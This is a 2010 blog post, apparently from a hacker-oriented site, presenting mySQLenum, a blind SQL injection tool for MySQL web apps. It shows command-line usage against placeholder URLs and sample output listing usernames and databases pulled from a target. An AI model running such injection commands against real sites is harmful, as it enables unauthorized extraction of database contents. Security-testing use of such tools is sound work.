Home » Post Item » mySQLenum – Automatic blind sql injection tool

mySQLenum – Automatic blind sql injection tool

June 1, 2010

mySQLenum is a command line automatic blind sql injection tool for web application that uses MySql server as its back-end. Its main goal is to provide an easy to use command line interface.

Coded in pure c, does not depends on external library, is fast and support all MySQL versions.

It is easy and simple to use, all web application develops who use database can use this tool to simply run and find known vulneability.

Click this bar to view the full image.

d0ca502dd100e50dc85410f9b18bc9c0 mySQLenum Automatic blind sql injection tool

Five necessary parameters:

–url: target URL
–sql-query: sql query to execute (or –macro to enter in Macro mode)
–param: vulnerable parameter
–param-value: a valid value to assign to parameter
–match-string: string to match in page content when the query is valid

How to use mySQLenum

mysqlenum –url=”http://www.oneexample.com/page.php” –sql-query=”select username from users” –param=page_id –param-value=1 –match-string=”Articolo 22″ –http-auth=”user:P4ssw0rd”

Query: select username from users

1) root
2) local
3) marco
4) luca
5) —

> Total requests: 192
> Data sent: 40 Kb
> Data received: 862 Kb

When above five parameter is not provided it automaticaly assumes.

- the request type is GET
- the webserver port is 80
- the charset used during the enumeration is included between – the ASCII values 32 and 122

we can use the CONCAT function to enumerate more fields with only one query:

One more macro mode example.

interactive Macro mode is possible to automatically enumerate:

- all available databases
- all tables of a specific database
- all fields of a specific table

the macro mode requires that the INFORMATION_SCHEMA is accessible.

mysqlenum –url=”http://www.example.com/page.php” –macro –param=page_id –param-value=1 –match-string=”Articolo 22″

Available macros:
1) Databases enumeration
2) Tables enumeration
3) Fields enumeration

Your choice: X

Databases:
1) information_schema
2) site
3) —

> Total requests: 227
> Data sent: 62 Kb
> Data received: 1066 Kb

Operating system supported

*nix Systems

Download mysqlenum Here

Posted by r00t3er at 6:43 pm | permalink

All comments are moderated. Your comments will not appear here unless approved by the blog owner. Thank you.

Add a comment








     

June 2010
M T W T F S S
« May   Jul »
 123456
78910111213
14151617181920
21222324252627
282930  

About Me

A happy fellow...listen more talk less..money rules (best rules) learn daily and never underestimate a thing nor a c0de..

sign: give me d source c0de of d world if u want the world to be a better place...

Message Board

r00t3er:

hi johnson smith, add any of my id.. and tell me what you need

johnson smith:

I am from robotex. please i need your tools and teachings.

Jah bless.

johnson smith:

I am from robotex. please i need your tools and teachings.

Jah bless.

s4l1ty:

blog walking ^o^

asd:

http://hackersbay.in

asd:

http://hackersbay.in

site is better

l4zyb0i:

nice blogs dude !!!

r00t3er:

hi guns..hows devilzc0de doing..i need some of ya scripts ..talk to you on ym if ur not always invisible lol heheh:d

mr. guns:

hello

r00t3er:

ok

aLeXH2L:

bro come to ym i got stuff waht u want

r00t3er:

dont forget to leave comments

support:

Congratulations, you’ve just completed the installation of this shoutbox.

support:

Hi! Your shoutbox is working fine!

Leave a message ▼
© 2007 Powered by Calliope. Design by Arcsin